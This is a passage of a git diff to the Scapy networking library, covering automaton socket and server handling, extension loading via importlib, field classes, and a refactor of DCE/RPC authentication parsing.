List[str] iosupersockets = [] # type: List[SuperSocket] + # used for spawn() + pkt_cls = conf.raw_layer + socketcls = StreamSocket + # Internals def __init__(self, *args, **kargs): # type: (Any, Any) -> None external_fd = kargs.pop("external_fd", {}) - self.send_sock_class = kargs.pop("ll", conf.L3socket) - self.recv_sock_class = kargs.pop("recvsock", conf.L2listen) + if "sock" in kargs: + # We use a bi-directional sock + self.sock = kargs["sock"] + else: + # Separate sockets + self.sock = None + self.send_sock_class = kargs.pop("ll", conf.L3socket) + self.recv_sock_class = kargs.pop("recvsock", conf.L2listen) + self.listen_sock = None # type: Optional[SuperSocket] + self.send_sock = None # type: Optional[SuperSocket] self.is_atmt_socket = kargs.pop("is_atmt_socket", False) + self.atmt_socket = kargs.pop("atmt_socket", None) self.started = threading.Lock() self.threadid = None # type: Optional[int] self.breakpointed = None @@ -890,7 +932,7 @@ def __init__(self, *args, **kargs): self.start() - def parse_args(self, debug=0, store=1, **kargs): + def parse_args(self, debug=0, store=0, **kargs): # type: (int, int, Any) -> None self.debug_level = debug if debug: @@ -898,14 +940,104 @@ def parse_args(self, debug=0, store=1, **kargs): self.socket_kargs = kargs self.store_packets = store + @classmethod + def spawn(cls, + port: int, + iface: Optional[_GlobInterfaceType] = None, + bg: bool = False, + **kwargs: Any) -> Optional[socket.socket]: + """ + Spawn a TCP server that listens for connections and start the automaton + for each new client. + + :param port: the port to listen to + :param bg: background mode? (default: False) + """ + from scapy.arch import get_if_addr + # create server sock and bind it + ssock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + local_ip = get_if_addr(iface or conf.iface) + try: + ssock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + except OSError: + pass + ssock.bind((local_ip, port)) + ssock.listen(5) + clients = [] + if kwargs.get("verb", True): + print(conf.color_theme.green( + "Server %s started listening on %s" % ( + cls.__name__, + (local_ip, port), + ) + )) + + def _run() -> None: + # Wait for clients forever + try: + while True: + clientsocket, address = ssock.accept() + if kwargs.get("verb", True): + print(conf.color_theme.gold( + "\u2503 Connection received from %s" % repr(address) + )) + # Start atmt class with socket + sock = cls.socketcls(clientsocket, cls.pkt_cls) + atmt_server = cls( + sock=sock, + iface=iface, **kwargs + ) + clients.append((atmt_server, clientsocket)) + # start atmt + atmt_server.runbg() + except KeyboardInterrupt: + print("X Exiting.") + ssock.shutdown(socket.SHUT_RDWR) + except OSError: + print("X Server closed.") + finally: + for atmt, clientsocket in clients: + try: + atmt.forcestop(wait=False) + except Exception: + pass + try: + clientsocket.shutdown(socket.SHUT_RDWR) + clientsocket.close() + except Exception: + pass + ssock.close() + if bg: + # Background + threading.Thread(target=_run).start() + return ssock + else: + # Non-background + _run() + return None + def master_filter(self, pkt): # type: (Packet) -> bool return True def my_send(self, pkt): # type: (Packet) -> None + if not self.send_sock: + raise ValueError("send_sock is None !") self.send_sock.send(pkt) + def update_sock(self, sock): + # type: (SuperSocket) -> None + """ + Update the socket used by the automata. + Typically used in an eof event to reconnect. + """ + self.sock = sock + if self.listen_sock is not None: + self.listen_sock = self.sock + if self.send_sock: + self.send_sock = self.sock + def timer_by_name(self, name): # type: (str) -> Optional[Timer] for _, timers in self.timeout.items(): @@ -1029,6 +1161,10 @@ def debug(self, lvl, msg): if self.debug_level >= lvl: log_runtime.debug(msg) + def isrunning(self): + # type: () -> bool + return self.started.locked() + def send(self, pkt): # type: (Packet) -> None if self.state.state in self.interception_points: @@ -1065,7 +1201,6 @@ def __iter__(self): def __del__(self): # type: () -> None - self.stop() self.destroy() def _run_condition(self, cond, *args, **kargs): @@ -1116,12 +1251,10 @@ def _do_control(self, ready, *args, **kargs): # Start the automaton self.state = self.initial_states[0](self) - self.send_sock = self.send_sock_class(**self.socket_kargs) + self.send_sock = self.sock or self.send_sock_class(**self.socket_kargs) if self.recv_conditions: # Only start a receiving socket if we have at least one recv_conditions - self.listen_sock = self.recv_sock_class(**self.socket_kargs) - else: - self.listen_sock = None + self.listen_sock = self.sock or self.recv_sock_class(**self.socket_kargs) # noqa: E501 self.packets = PacketList(name="session[%s]" % self.__class__.__name__) singlestep = True @@ -1142,9 +1275,9 @@ def _do_control(self, ready, *args, **kargs): elif c.type == _ATMT_Command.FREEZE: continue elif c.type == _ATMT_Command.STOP: - if self.stop_states: + if self.stop_state: # There is a stop state - self.state = self.stop_states[0](self) + self.state = self.stop_state() iterator = self._do_iter() else: # Act as FORCESTOP @@ -1174,9 +1307,9 @@ def _do_control(self, ready, *args, **kargs): self.cmdout.send(m) self.debug(3, "Stopping control thread (tid=%i)" % self.threadid) self.threadid = None - if getattr(self, "listen_sock", None): + if self.listen_sock: self.listen_sock.close() - if getattr(self, "send_sock", None): + if self.send_sock: self.send_sock.close() def _do_iter(self): @@ -1224,9 +1357,11 @@ def _do_iter(self): timers.reset() time_previous = time.time() - fds = [self.cmdin] + fds = [self.cmdin] # type: List[Union[SuperSocket, ObjectPipe[Any]]] + select_func = select_objects if self.listen_sock and self.recv_conditions[self.state.state]: fds.append(self.listen_sock) + select_func = self.listen_sock.select # type: ignore for ioev in self.ioevents[self.state.state]: fds.append(self.ioin[ioev.atmt_ioname]) while True: @@ -1238,14 +1373,32 @@ def _do_iter(self): remain = timers.until_next() self.debug(5, "Select on %r" % fds) - r = select_objects(fds, remain) + r = select_func(fds, remain) self.debug(5, "Selected %r" % r) for fd in r: self.debug(5, "Looking at %r" % fd) if fd == self.cmdin: yield self.CommandMessage("Received command message") # noqa: E501 elif fd == self.listen_sock: - pkt = self.listen_sock.recv(MTU) + try: + pkt = self.listen_sock.recv() + except EOFError: + # Socket was closed abruptly. This will likely only + # ever happen when a client socket is passed to the + # automaton (not the case when the automaton is + # listening on a promiscuous conf.L2sniff) + self.listen_sock.close() + # False so that it is still reset by update_sock + self.listen_sock = False # type: ignore + fds.remove(fd) + if self.state.state in self.eofs: + # There is an eof state + eof = self.eofs[self.state.state] + self.debug(2, "Condition EOF [%s] taken" % eof.__name__) # noqa: E501 + raise self.eofs[self.state.state](self) + else: + # There isn't. Therefore, it's a closing condition. + raise EOFError("Socket ended arbruptly.") if pkt is not None: if self.master_filter(pkt): self.debug(3, "RECVD: %s" % pkt.summary()) # noqa: E501 @@ -1268,7 +1421,7 @@ def __repr__(self): # type: () -> str return "" % ( self.__class__.__name__, - ["HALTED", "RUNNING"][self.started.locked()] + ["HALTED", "RUNNING"][self.isrunning()] ) # Public API @@ -1302,7 +1455,7 @@ def remove_breakpoints(self, *bps): def start(self, *args, **kargs): # type: (Any, Any) -> None - if self.started.locked(): + if self.isrunning(): raise ValueError("Already started") # Start the control thread self._do_start(*args, **kargs) @@ -1360,12 +1513,12 @@ def destroy(self): Destroys a stopped Automaton: this cleanups all opened file descriptors. Required on PyPy for instance where the garbage collector behaves differently. """ - if self.started.locked(): + if self.isrunning(): raise ValueError("Can't close running Automaton ! Call stop() beforehand") - self._flush_inout() # Close command pipes self.cmdin.close() self.cmdout.close() + self._flush_inout() # Close opened ioins/ioouts for i in itertools.chain(self.ioin.values(), self.ioout.values()): if isinstance(i, ObjectPipe): diff --git a/scapy/config.py b/scapy/config.py index 1f2ff4b9eea..bccbd557837 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -21,6 +21,10 @@ from dataclasses import dataclass from enum import Enum +import importlib +import importlib.abc +import importlib.util + import scapy from scapy import VERSION from scapy.base_classes import BasePacket @@ -374,12 +378,18 @@ def __getitem__(self, item): # type: (str) -> Any if item in self.__slots__: return object.__getattribute__(self, item) - val = super(CacheInstance, self).__getitem__(item) + if not self.__contains__(item): + raise KeyError(item) + return super(CacheInstance, self).__getitem__(item) + + def __contains__(self, item): + if not super(CacheInstance, self).__contains__(item): + return False if self.timeout is not None: t = self._timetable[item] if time.time() - t > self.timeout: - raise KeyError(item) - return val + return False + return True def get(self, item, default=None): # type: (str, Optional[Any]) -> Any @@ -522,7 +532,7 @@ def __repr__(self): class ScapyExt: - __slots__ = ["modules", "name", "version"] + __slots__ = ["specs", "name", "version"] class MODE(Enum): LAYERS = "layers" @@ -530,32 +540,46 @@ class MODE(Enum): MODULES = "modules" @dataclass - class ScapyExtModule: - name: str + class ScapyExtSpec: + fullname: str mode: 'ScapyExt.MODE' - module: Optional[ModuleType] + spec: Any + default: bool def __init__(self): - self.modules: Dict[str, 'ScapyExt.ScapyExtModule'] = {} + self.specs: Dict[str, 'ScapyExt.ScapyExtSpec'] = {} def config(self, name, version): self.name = name self.version = version - def register(self, name, mode, module=None): + def register(self, name, mode, path, default=None): assert mode in self.MODE, "mode must be one of ScapyExt.MODE !" - self.modules[name] = self.ScapyExtModule(name, mode, module) + fullname = f"scapy.{mode.value}.{name}" + spec = importlib.util.spec_from_file_location( + fullname, + str(path), + ) + spec = self.ScapyExtSpec( + fullname=fullname, + mode=mode, + spec=spec, + default=default or False, + ) + if default is None: + spec.default = bool(importlib.util.find_spec(spec.fullname)) + self.specs[fullname] = spec def __repr__(self): - return "" % ( + return "" % ( self.name, self.version, - len(self.modules), + len(self.specs), ) -class ExtsManager: - __slots__ = ["exts", "_loaded"] +class ExtsManager(importlib.abc.MetaPathFinder): + __slots__ = ["exts", "_loaded", "all_specs"] SCAPY_PLUGIN_CLASSIFIER = 'Framework :: Scapy' GPLV2_CLASSIFIERS = [ @@ -565,19 +589,30 @@ class ExtsManager: def __init__(self): self.exts: List[ScapyExt] = [] + self.all_specs: Dict[str, ScapyExt.ScapyExtSpec] = {} self._loaded = [] - def _register_module(self, name, mode, module): - sys.modules[f"scapy.{mode.value}.{name}"] = module + def find_spec(self, fullname, path, target=None): + if fullname in self.all_specs: + return self.all_specs[fullname].spec + + def invalidate_caches(self): + pass + + def _register_spec(self, spec): + self.all_specs[spec.fullname] = spec + if spec.default: + loader = importlib.util.LazyLoader(spec.spec.loader) + spec.spec.loader = loader + module = importlib.util.module_from_spec(spec.spec) + sys.modules[spec.fullname] = module + loader.exec_module(module) def load(self): - """ - Find and loads Extensions. This is executed when Scapy loads. - An ext must include the Scapy Framework classifier, a scapy_ext func and be - under GPLv2. - """ - import importlib - import importlib.metadata + try: + import importlib.metadata + except ImportError: + return for distr in importlib.metadata.distributions(): if any( v == self.SCAPY_PLUGIN_CLASSIFIER @@ -617,7 +652,7 @@ def load(self): scapy_ext_func = scapy_ext.scapy_ext except AttributeError: log_loading.info( - "Module '%s' included the Scapy Framework specifier " + "'%s' included the Scapy Framework specifier " "but did not include a scapy_ext" % pkg ) continue @@ -631,18 +666,20 @@ def load(self): ) ) continue - for mod in ext.modules.values(): - self._register_module(mod.name, mod.mode, mod.module) + for spec in ext.specs.values(): + self._register_spec(spec) self.exts.append(ext) + if self not in sys.meta_path: + sys.meta_path.append(self) def __repr__(self): from scapy.utils import pretty_list return pretty_list( [ - (x.name, x.version, [y.name for y in x.modules.values()]) + (x.name, x.version, [y.fullname for y in x.specs.values()]) for x in self.exts ], - [("Name", "Version", "Modules")], + [("Name", "Version", "Specs")], sortBy=0, ) @@ -862,6 +899,8 @@ class Conf(ConfClass): commands = CommandsList() # type: CommandsList #: Codec used by default for ASN1 objects ASN1_default_codec = None # type: 'scapy.asn1.asn1.ASN1Codec' + #: Default size for ASN1 objects + ASN1_default_long_size = 0 #: choose the AS resolver class to use AS_resolver = None # type: scapy.as_resolvers.AS_resolver dot15d4_protocol = None # Used in dot15d4.py @@ -985,6 +1024,7 @@ class Conf(ConfClass): 'dot15d4', 'eap', 'gprs', + 'gssapi', 'hsrp', 'inet', 'inet6', @@ -999,7 +1039,6 @@ class Conf(ConfClass): 'lltd', 'mgcp', 'mobileip', - 'mspac', 'netbios', 'netflow', 'ntlm', @@ -1018,6 +1057,7 @@ class Conf(ConfClass): 'smbclient', 'smbserver', 'snmp', + 'spnego', 'tftp', 'vrrp', 'vxlan', diff --git a/scapy/contrib/automotive/bmw/hsfz.py b/scapy/contrib/automotive/bmw/hsfz.py index 558141fc8bc..0d8724e24bf 100644 --- a/scapy/contrib/automotive/bmw/hsfz.py +++ b/scapy/contrib/automotive/bmw/hsfz.py @@ -90,7 +90,7 @@ def __init__(self, ip='127.0.0.1', port=6801): self.buffer = b"" def recv(self, x=MTU, **kwargs): - # type: (int, **Any) -> Optional[Packet] + # type: (Optional[int], **Any) -> Optional[Packet] if self.buffer: len_data = self.buffer[:4] else: @@ -143,7 +143,7 @@ def send(self, x): return 0 def recv(self, x=MTU, **kwargs): - # type: (int, **Any) -> Optional[Packet] + # type: (Optional[int], **Any) -> Optional[Packet] pkt = super(UDS_HSFZSocket, self).recv(x) if pkt: return self.outputcls(bytes(pkt.payload), **kwargs) diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index 675840a095c..ba66ef8a84d 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -296,7 +296,7 @@ def __init__(self, ip='127.0.0.1', port=13400, activate_routing=True, source_address, target_address, activation_type, reserved_oem) def recv(self, x=MTU, **kwargs): - # type: (int, **Any) -> Optional[Packet] + # type: (Optional[int], **Any) -> Optional[Packet] if self.buffer: len_data = self.buffer[:8] else: @@ -410,7 +410,7 @@ def send(self, x): return super(UDS_DoIPSocket, self).send(pkt) def recv(self, x=MTU, **kwargs): - # type: (int, **Any) -> Optional[Packet] + # type: (Optional[int], **Any) -> Optional[Packet] pkt = super(UDS_DoIPSocket, self).recv(x, **kwargs) if pkt and pkt.payload_type == 0x8001: return pkt.payload diff --git a/scapy/error.py b/scapy/error.py index 533a6c3a47b..44a3561228e 100644 --- a/scapy/error.py +++ b/scapy/error.py @@ -108,6 +108,7 @@ def format(self, record): # get Scapy's master logger log_scapy = logging.getLogger("scapy") +log_scapy.propagate = False # override the level if not already set if log_scapy.level == logging.NOTSET: log_scapy.setLevel(logging.WARNING) diff --git a/scapy/fields.py b/scapy/fields.py index a97b2d75df5..39ae2f6667b 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -19,6 +19,7 @@ import time import warnings +from datetime import datetime from types import MethodType from uuid import UUID from enum import Enum @@ -428,48 +429,56 @@ def __getattr__(self, attr): class MultipleTypeField(_FieldContainer): - """MultipleTypeField are used for fields that can be implemented by -various Field subclasses, depending on conditions on the packet. - -It is initialized with `flds` and `dflt`. - -`dflt` is the default field type, to be used when none of the -conditions matched the current packet. - -`flds` is a list of tuples (`fld`, `cond`), where `fld` if a field -type, and `cond` a "condition" to determine if `fld` is the field type -that should be used. + """ + MultipleTypeField are used for fields that can be implemented by + various Field subclasses, depending on conditions on the packet. -`cond` is either: + It is initialized with `flds` and `dflt`. - - a callable `cond_pkt` that accepts one argument (the packet) and - returns True if `fld` should be used, False otherwise. + :param dflt: is the default field type, to be used when none of the + conditions matched the current packet. + :param flds: is a list of tuples (`fld`, `cond`) or (`fld`, `cond`, `hint`) + where `fld` if a field type, and `cond` a "condition" to + determine if `fld` is the field type that should be used. - - a tuple (`cond_pkt`, `cond_pkt_val`), where `cond_pkt` is the same - as in the previous case and `cond_pkt_val` is a callable that - accepts two arguments (the packet, and the value to be set) and - returns True if `fld` should be used, False otherwise. + ``cond`` is either: -See scapy.layers.l2.ARP (type "help(ARP)" in Scapy) for an example of -use. + - a callable `cond_pkt` that accepts one argument (the packet) and + returns True if `fld` should be used, False otherwise. + - a tuple (`cond_pkt`, `cond_pkt_val`), where `cond_pkt` is the same + as in the previous case and `cond_pkt_val` is a callable that + accepts two arguments (the packet, and the value to be set) and + returns True if `fld` should be used, False otherwise. + See scapy.layers.l2.ARP (type "help(ARP)" in Scapy) for an example of + use. """ - __slots__ = ["flds", "dflt", "name", "default"] + __slots__ = ["flds", "dflt", "hints", "name", "default"] - def __init__(self, - flds, # type: List[Tuple[Field[Any, Any], Any]] - dflt # type: Field[Any, Any] - ): - # type: (...) -> None - self.flds = flds + def __init__( + self, + flds: List[Union[ + Tuple[Field[Any, Any], Any, str], + Tuple[Field[Any, Any], Any] + ]], + dflt: Field[Any, Any] + ) -> None: + self.hints = { + x[0]: x[2] + for x in flds + if len(x) == 3 + } + self.flds = [ + (x[0], x[1]) for x in flds + ] self.dflt = dflt self.default = None # So that we can detect changes in defaults self.name = self.dflt.name if any(x[0].name != self.name for x in self.flds): warnings.warn( ("All fields should have the same name in a " - "MultipleTypeField (%s)") % self.name, + "MultipleTypeField (%s). Use hints.") % self.name, SyntaxWarning ) @@ -587,7 +596,10 @@ def i2len(self, pkt, val): def i2repr(self, pkt, val): # type: (Optional[Packet], Any) -> str fld, val = self._find_fld_pkt_val(pkt, val) - return fld.i2repr(pkt, val) + hint = "" + if fld in self.hints: + hint = " (%s)" % self.hints[fld] + return fld.i2repr(pkt, val) + hint def register_owner(self, cls): # type: (Type[Packet]) -> None @@ -1430,7 +1442,7 @@ def any2i(self, pkt, x): def i2repr(self, pkt, x): # type: (Optional[Packet], I) -> str - if isinstance(x, bytes): + if x and isinstance(x, bytes): return repr(x) return super(_StrField, self).i2repr(pkt, x) @@ -1463,10 +1475,6 @@ class StrField(_StrField[bytes]): class StrFieldUtf16(StrField): - def h2i(self, pkt, x): - # type: (Optional[Packet], Optional[str]) -> bytes - return plain_str(x).encode('utf-16-le') - def any2i(self, pkt, x): # type: (Optional[Packet], Optional[str]) -> bytes if isinstance(x, str): @@ -1477,6 +1485,10 @@ def i2repr(self, pkt, x): # type: (Optional[Packet], bytes) -> str return plain_str(self.i2h(pkt, x)) + def h2i(self, pkt, x): + # type: (Optional[Packet], Optional[str]) -> bytes + return plain_str(x).encode('utf-16-le', errors="replace") + def i2h(self, pkt, x): # type: (Optional[Packet], bytes) -> str return bytes_encode(x).decode('utf-16-le', errors="replace") @@ -1969,6 +1981,8 @@ def getfield(self, pkt, s): len_pkt = (self.length_from or (lambda x: 0))(pkt) if not self.ON_WIRE_SIZE_UTF16: len_pkt *= 2 + if len_pkt == 0: + return s, b"" return s[len_pkt:], self.m2i(pkt, s[:len_pkt]) def randval(self): @@ -2187,7 +2201,6 @@ def i2m(self, pkt, x): class StrNullField(StrField): DELIMITER = b"\x00" - ALIGNMENT = 1 def addfield(self, pkt, s, val): # type: (Packet, bytes, Optional[bytes]) -> bytes @@ -2204,7 +2217,7 @@ def getfield(self, if len_str < 0: # DELIMITER not found: return empty return b"", s - if len_str % self.ALIGNMENT: + if len_str % len(self.DELIMITER): len_str += 1 else: break @@ -2221,7 +2234,6 @@ def i2len(self, pkt, x): class StrNullFieldUtf16(StrNullField, StrFieldUtf16): DELIMITER = b"\x00\x00" - ALIGNMENT = 2 class StrStopField(StrField): @@ -3499,9 +3511,9 @@ def i2repr(self, pkt, x): x = x / 1e9 elif self.custom_scaling: x = x / self.custom_scaling - x = int(x) + self.delta - t = time.strftime(self.strf, time.gmtime(x)) - return "%s (%d)" % (t, x) + x += self.delta + t = datetime.fromtimestamp(x).strftime(self.strf) + return "%s (%d)" % (t, int(x)) def i2m(self, pkt, x): # type: (Optional[Packet], Optional[float]) -> int diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index e1901c30b1c..41c39960228 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -1,8 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy # See https://scapy.net/ for more information -# Copyright (C) 2016 Gauthier Sebaux -# 2022 Gabriel Potter +# Copyright (C) Gabriel Potter # scapy.contrib.description = DCE/RPC # scapy.contrib.status = loads @@ -16,23 +15,40 @@ And on [MS-RPCE] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/290c38b1-92fe-4229-91e6-4fc376610c15 + +.. note:: + Please read the documentation over + `DCE/RPC `_ """ from functools import partial -from collections import namedtuple, deque +import collections import struct +from enum import IntEnum from uuid import UUID from scapy.base_classes import Packet_metaclass from scapy.config import conf +from scapy.compat import bytes_encode, plain_str from scapy.error import log_runtime from scapy.layers.dns import DNSStrField -from scapy.layers.ntlm import NTLM_Header -from scapy.packet import Packet, Raw, bind_bottom_up, bind_layers, bind_top_down +from scapy.layers.ntlm import ( + NTLM_Header, + NTLMSSP_MESSAGE_SIGNATURE, +) +from scapy.packet import ( + Packet, + Raw, + bind_bottom_up, + bind_layers, + bind_top_down, + NoPayload, +) from scapy.fields import ( _FieldContainer, BitEnumField, + BitField, ByteEnumField, ByteField, ConditionalField, @@ -41,17 +57,12 @@ FieldLenField, FieldListField, FlagsField, - IEEEDoubleField, - IEEEFloatField, IntField, LEIntEnumField, LEIntField, LELongField, LEShortEnumField, LEShortField, - LESignedIntField, - LESignedLongField, - LESignedShortField, LenField, MultipleTypeField, PacketField, @@ -79,9 +90,15 @@ XStrFixedLenField, ) from scapy.sessions import DefaultSession +from scapy.supersocket import StreamSocket -from scapy.layers.kerberos import KRB5_GSS_Wrap_RFC1964, KRB5_GSS_Wrap, Kerberos -from scapy.layers.gssapi import GSSAPI_BLOB +from scapy.layers.kerberos import ( + KRB_GSS_Wrap_RFC1964, + KRB_GSS_Wrap, + KRB_InnerToken, + Kerberos, +) +from scapy.layers.gssapi import GSSAPI_BLOB, GSSAPI_BLOB_SIGNATURE, SSP from scapy.layers.inet import TCP from scapy.contrib.rtps.common_types import ( @@ -96,6 +113,12 @@ Optional, ) +# the alignment of auth_pad +# This is 4 in [C706] 13.2.6.1 but was updated to 16 in [MS-RPCE] 2.2.2.11 +_COMMON_AUTH_PAD = 16 +# the alignment of the NDR Type 1 serialization private header +# ([MS-RPCE] sect 2.2.6.2) +_TYPE1_S_PAD = 8 # DCE/RPC Packet DCE_RPC_TYPE = { @@ -140,6 +163,20 @@ "reserved_6", "reserved_7", ] +DCE_RPC_TRANSFER_SYNTAXES = { + UUID("00000000-0000-0000-0000-000000000000"): "NULL", + UUID("6cb71c2c-9812-4540-0300-000000000000"): "Bind Time Feature Negotiation", + UUID("8a885d04-1ceb-11c9-9fe8-08002b104860"): "NDR 2.0", + UUID("71710533-beba-4937-8319-b5dbef9ccc36"): "NDR64", +} +DCE_RPC_INTERFACES_NAMES = {} +DCE_RPC_INTERFACES_NAMES_rev = {} + + +class DCERPC_Transport(IntEnum): + NCACN_IP_TCP = 1 + NCACN_NP = 2 + # TODO: add more.. if people use them? def _dce_rpc_endianess(pkt): @@ -195,7 +232,7 @@ def endianness(self): ] -class DceRpc4(Packet): +class DceRpc4(DceRpc): """ DCE/RPC v4 'connection-less' packet """ @@ -209,9 +246,9 @@ class DceRpc4(Packet): ByteEnumField("ptype", 0, DCE_RPC_TYPE), FlagsField("flags1", 0, 8, _DCE_RPC_4_FLAGS1), FlagsField("flags2", 0, 8, _DCE_RPC_4_FLAGS2), - ] + - _drep + - [ + ] + + _drep + + [ XByteField("serial_hi", 0), _EField(UUIDField("object", None)), _EField(UUIDField("if_id", None)), @@ -230,7 +267,7 @@ class DceRpc4(Packet): ) -# Exceptionally, we define those 2 here. +# Exceptionally, we define those 3 here. class NL_AUTH_MESSAGE(Packet): @@ -311,54 +348,78 @@ class NL_AUTH_SIGNATURE(Packet): XStrFixedLenField("Confounder", b"", length=8), lambda pkt: pkt.SealAlgorithm != 0xFFFF, ), - MultipleTypeField([ - (StrFixedLenField("Reserved2", b"", length=24), - lambda pkt: pkt.SignatureAlgorithm == 0x0013), - ], StrField("Reserved2", b"") + MultipleTypeField( + [ + ( + StrFixedLenField("Reserved2", b"", length=24), + lambda pkt: pkt.SignatureAlgorithm == 0x0013, + ), + ], + StrField("Reserved2", b""), ), ] -# sect 13.2.6.1 +# [MS-RPCE] sect 2.2.1.1.7 +# https://learn.microsoft.com/en-us/windows/win32/rpc/authentication-service-constants +# rpcdce.h -_MSRPCE_SECURITY_PROVIDERS = { - # [MS-RPCE] sect 2.2.1.1.7 - 0x00: "None", - 0x09: "SPNEGO", - 0x0A: "NTLM", - 0x0E: "TLS", - 0x10: "Kerberos", - 0x44: "Netlogon", - 0xFF: "NTLM", -} +class RPC_C_AUTHN(IntEnum): + NONE = 0x00 + DCE_PRIVATE = 0x01 + DCE_PUBLIC = 0x02 + DEC_PUBLIC = 0x04 + GSS_NEGOTIATE = 0x09 + WINNT = 0x0A + GSS_SCHANNEL = 0x0E + GSS_KERBEROS = 0x10 + DPA = 0x11 + MSN = 0x12 + KERNEL = 0x14 + DIGEST = 0x15 + NEGO_EXTENDED = 0x1E + PKU2U = 0x1F + LIVE_SSP = 0x20 + LIVEXP_SSP = 0x23 + CLOUD_AP = 0x24 + NETLOGON = 0x44 + MSONLINE = 0x52 + MQ = 0x64 + DEFAULT = 0xFFFFFFFF -_MSRPCE_SECURITY_AUTHLEVELS = { - # [MS-RPCE] sect 2.2.1.1.7 - 0x00: "RPC_C_AUTHN_LEVEL_DEFAULT", - 0x01: "RPC_C_AUTHN_LEVEL_NONE", - 0x02: "RPC_C_AUTHN_LEVEL_CONNECT", - 0x03: "RPC_C_AUTHN_LEVEL_CALL", - 0x04: "RPC_C_AUTHN_LEVEL_PKT", - 0x05: "RPC_C_AUTHN_LEVEL_PKT_INTEGRITY", - 0x06: "RPC_C_AUTHN_LEVEL_PKT_PRIVACY", -} + +class RPC_C_AUTHN_LEVEL(IntEnum): + DEFAULT = 0x0 + NONE = 0x1 + CONNECT = 0x2 + CALL = 0x3 + PKT = 0x4 + PKT_INTEGRITY = 0x5 + PKT_PRIVACY = 0x6 + + +DCE_C_AUTHN_LEVEL = RPC_C_AUTHN_LEVEL # C706 name + + +# C706 sect 13.2.6.1 class CommonAuthVerifier(Packet): - name = "Common Authentication Verifier (sec_trailer)" + name = "Common Authentication Verifier" fields_desc = [ ByteEnumField( "auth_type", 0, - _MSRPCE_SECURITY_PROVIDERS, + RPC_C_AUTHN, ), - ByteEnumField("auth_level", 0, _MSRPCE_SECURITY_AUTHLEVELS), + ByteEnumField("auth_level", 0, RPC_C_AUTHN_LEVEL), ByteField("auth_pad_length", None), ByteField("auth_reserved", 0), XLEIntField("auth_context_id", 0), MultipleTypeField( [ + # SPNEGO ( PacketLenField( "auth_value", @@ -366,17 +427,26 @@ class CommonAuthVerifier(Packet): GSSAPI_BLOB, length_from=lambda pkt: pkt.parent.auth_len, ), - lambda pkt: pkt.auth_type == 0x09, + lambda pkt: pkt.auth_type == 0x09 and pkt.parent and + # Bind/Alter + pkt.parent.ptype in [11, 12, 13, 14, 15, 16], ), ( PacketLenField( "auth_value", - NTLM_Header(), - NTLM_Header, + GSSAPI_BLOB_SIGNATURE(), + GSSAPI_BLOB_SIGNATURE, length_from=lambda pkt: pkt.parent.auth_len, ), - lambda pkt: pkt.auth_type in [0x0A, 0xFF], + lambda pkt: pkt.auth_type == 0x09 + and pkt.parent + and ( + # Other + not pkt.parent + or pkt.parent.ptype not in [11, 12, 13, 14, 15, 16] + ), ), + # Kerberos ( PacketLenField( "auth_value", @@ -386,6 +456,33 @@ class CommonAuthVerifier(Packet): ), lambda pkt: pkt.auth_type == 0x10, ), + # NTLM + ( + PacketLenField( + "auth_value", + NTLM_Header(), + NTLM_Header, + length_from=lambda pkt: pkt.parent.auth_len, + ), + lambda pkt: pkt.auth_type in [0x0A, 0xFF] and pkt.parent and + # Bind/Alter + pkt.parent.ptype in [11, 12, 13, 14, 15, 16], + ), + ( + PacketLenField( + "auth_value", + NTLMSSP_MESSAGE_SIGNATURE(), + NTLMSSP_MESSAGE_SIGNATURE, + length_from=lambda pkt: pkt.parent.auth_len, + ), + lambda pkt: pkt.auth_type in [0x0A, 0xFF] + and pkt.parent + and ( + # Other + not pkt.parent + or pkt.parent.ptype not in [11, 12, 13, 14, 15, 16] + ), + ), # NetLogon ( PacketLenField( @@ -394,8 +491,8 @@ class CommonAuthVerifier(Packet): NL_AUTH_MESSAGE, length_from=lambda pkt: pkt.parent.auth_len, ), - lambda pkt: pkt.auth_type == 0x44 and - pkt.parent and + lambda pkt: pkt.auth_type == 0x44 and pkt.parent and + # Bind/Alter pkt.parent.ptype in [11, 12, 13, 14, 15], ), ( @@ -405,8 +502,12 @@ class CommonAuthVerifier(Packet): NL_AUTH_SIGNATURE, length_from=lambda pkt: pkt.parent.auth_len, ), - lambda pkt: pkt.auth_type == 0x44 and - (not pkt.parent or pkt.parent.ptype not in [11, 12, 13, 14, 15]), + lambda pkt: pkt.auth_type == 0x44 + and ( + # Other + not pkt.parent + or pkt.parent.ptype not in [11, 12, 13, 14, 15] + ), ), ], PacketLenField( @@ -418,58 +519,220 @@ class CommonAuthVerifier(Packet): ), ] - def is_encrypted(self): - if self.auth_type == 9 and isinstance(self.auth_value, GSSAPI_BLOB): + def is_protected(self): + if self.auth_type == 0x09 and isinstance(self.auth_value, GSSAPI_BLOB): return isinstance( - self.auth_value.innerContextToken, - (KRB5_GSS_Wrap_RFC1964, KRB5_GSS_Wrap), + self.auth_value.innerToken, KRB_InnerToken + ) and isinstance( # noqa: E501 + self.auth_value.innerToken.root, + (KRB_GSS_Wrap_RFC1964, KRB_GSS_Wrap), ) elif self.auth_type == 0x44: - return (not self.parent or self.parent.ptype not in [11, 12, 13, 14, 15]) + return isinstance(self.auth_value, NL_AUTH_SIGNATURE) + elif self.auth_type in [0x0A, 0xFF] and self.auth_value: + return isinstance(self.auth_value, NTLMSSP_MESSAGE_SIGNATURE) return False def default_payload_class(self, pkt): return conf.padding_layer -# sect 12.6 +# [MS-RPCE] sect 2.2.2.13 - Verification Trailer +_SECTRAILER_MAGIC = b"\x8a\xe3\x13\x71\x02\xf4\x36\x71" + + +class DceRpcSecVTCommand(Packet): + name = "Verification trailer command" + fields_desc = [ + BitField("SEC_VT_MUST_PROCESS_COMMAND", 0, 1, tot_size=-2), + BitField("SEC_VT_COMMAND_END", 0, 1), + BitEnumField( + "Command", + 0, + -14, + { + 0x0001: "SEC_VT_COMMAND_BITMASK_1", + 0x0002: "SEC_VT_COMMAND_PCONTEXT", + 0x0003: "SEC_VT_COMMAND_HEADER2", + 